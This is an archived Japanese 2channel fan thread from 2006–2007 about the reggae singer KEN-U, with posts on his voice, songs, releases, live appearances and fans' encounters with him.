165 :NO MUSIC NO NAME:2006/12/13(水) 19:56:26 ID:J6pZ6xtd
そうかなぁ…ドミの声好きだなぁ。髪型もいつもかっこいいし。

166 :NO MUSIC NO NAME:2006/12/15(金) 03:07:17 ID:JP85EGLJ
バイブス高いけどね。わざとあんな歌い方してんのか?

167 :NO MUSIC NO NAME:2006/12/15(金) 18:42:25 ID:otV//3no ?2BP(33)
ガンジャだろ

168 :メグ:2006/12/23(土) 03:44:18 ID:DzVsA/xU
KEN-Uがいた、北海道の高校の時の友達(愛知県中川区のようすけ)と、付き合ってたよ

169 :NO MUSIC NO NAME:2006/12/23(土) 17:17:08 ID:JCZbXr4q
その言い回しだと面識なさそうw。てか名前はよくないw

170 :NO MUSIC NO NAME:2006/12/24(日) 12:02:27 ID:Sn7jVC+k
ケンユーやばいカッコイイー!はやく新曲とかでないかなぁッ

171 :えな:2007/01/01(月) 13:29:32 ID:cV7Yy/8Q
27日asia行って帰り外で喋ったょ♪
普通に話してくれて超いぃ人だったo(^-^)o

172 :出島:2007/01/03(水) 03:33:46 ID:1vx3cfCK
まぢで(?_?)いいなー何話したんだ???

173 :NO MUSIC NO NAME:2007/01/03(水) 15:48:59 ID:UXpC1a+X
DVDは出ないのかな?

174 :NO MUSIC NO NAME:2007/01/05(金) 19:10:34 ID:a/T0ZYvq
東京キネマ倶楽部の??出るってウーフィンで言ってたょね↓あたしも知りたい!!!

175 :NO MUSIC NO NAME:2007/01/05(金) 19:15:57 ID:s78x3Ni+


176 :NO MUSIC NO NAME:2007/01/07(日) 04:10:28 ID:e770ZDyR
レゲBoxのpassわかる?
あそこケンユー沢山あるんだよな〜

177 :NO MUSIC NO NAME:2007/01/07(日) 13:06:06 ID:9VBDa9Ho
おはよ

178 :NO MUSIC NO NAME:2007/01/12(金) 04:59:43 ID:w+aTyzaK
DOKOの睡眠薬バージョンのCDてワーグワン2K5以外で出てるん??2K5だと短いし録音状態悪いんよね…(T-T)

179 :NO MUSIC NO NAME:2007/01/14(日) 01:33:49 ID:998ijPCu
age

180 :NO MUSIC NO NAME:2007/01/14(日) 15:05:36 ID:wXzQTzud
KEN-Uのなんか声が響いてる感じで歌ってる曲わかりませんか!?超あいまいでスイマセン;

181 :NO MUSIC NO NAME:2007/01/14(日) 16:56:12 ID:1CDfO5l/


182 :NO MUSIC NO NAME:2007/01/19(金) 09:27:38 ID:EnBoyR8x
MUNEHIROのアルバムにKEN-U参加してるよ。かなりかっこいい!!

183 :NO MUSIC NO NAME:2007/01/19(金) 12:26:37 ID:Fa4OgFy0
いいですよね!ムネヒロも好きだから出て速攻買いました!

184 :NO MUSIC NO NAME:2007/01/20(土) 16:17:55 ID:lKvJkkwP
歌下手じゃね?

185 :NO MUSIC NO NAME:2007/01/21(日) 03:01:44 ID:ufsMKZWR
俺も最初は「なんやこの変な声?」って大嫌いやったけど知らん間にハマッてた笑っ
いまぢゃ毎日聞いてるわ笑っ

DOKOのバリアフリーダブとか芸術もんやで笑っ

186 :NO MUSIC NO NAME:2007/01/22(月) 14:30:35 ID:ht7506oV
明日会えるね(^_^)vケンユーくん♪

187 :NO MUSIC NO NAME:2007/01/31(水) 01:12:57 ID:b5pDu6uc
↑、無事に会えたんか??

188 :NO MUSIC NO NAME:2007/02/07(水) 08:03:31 ID:AeLl76vv
180>>

アコースティックメドレーかな??

189 :NO MUSIC NO NAME:2007/02/07(水) 20:09:30 ID:QWHgJcU4
>>188
それってDOKOに入ってますよね?それじゃないんです

190 :NO MUSIC NO NAME:2007/02/11(日) 09:45:12 ID:orcWVnwz
響いてる感じって、声をちょっと加工してあるみたぃなの??HONEYぢゃない(?_?)

191 :NO MUSIC NO NAME:2007/02/12(月) 09:35:08 ID:sFSAO7wn
違うんですよ〜。たぶんもっと前のだと思うんですけど…。一回聞いただけだから覚えてなくて

192 :NO MUSIC NO NAME:2007/02/12(月) 18:50:15 ID:sC9jC03d
なんだろ。SOROSORO?夜空のKEN-Uんとこ?KEN-Uだけ歌ってるの?

193 :NO MUSIC NO NAME:2007/02/12(月) 18:51:34 ID:81xpRU6b
下げろクズ

194 :NO MUSIC NO NAME:2007/02/15(木) 13:30:29 ID:NQWmv0DR
あげ★シラフの彼は無口か??

195 ::2007/02/21(水) 02:22:45 ID:fBXYaE7K
WINE YEHA良くないですか

196 :NO MUSIC NO NAME:2007/02/21(水) 13:52:52 ID:FT5tih/A
ぃぃですね♪ミッキーリッチも好きです!

197 ::2007/02/21(水) 14:08:11 ID:fBXYaE7K
KEN-Uって大阪でライブしてますか??

30 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)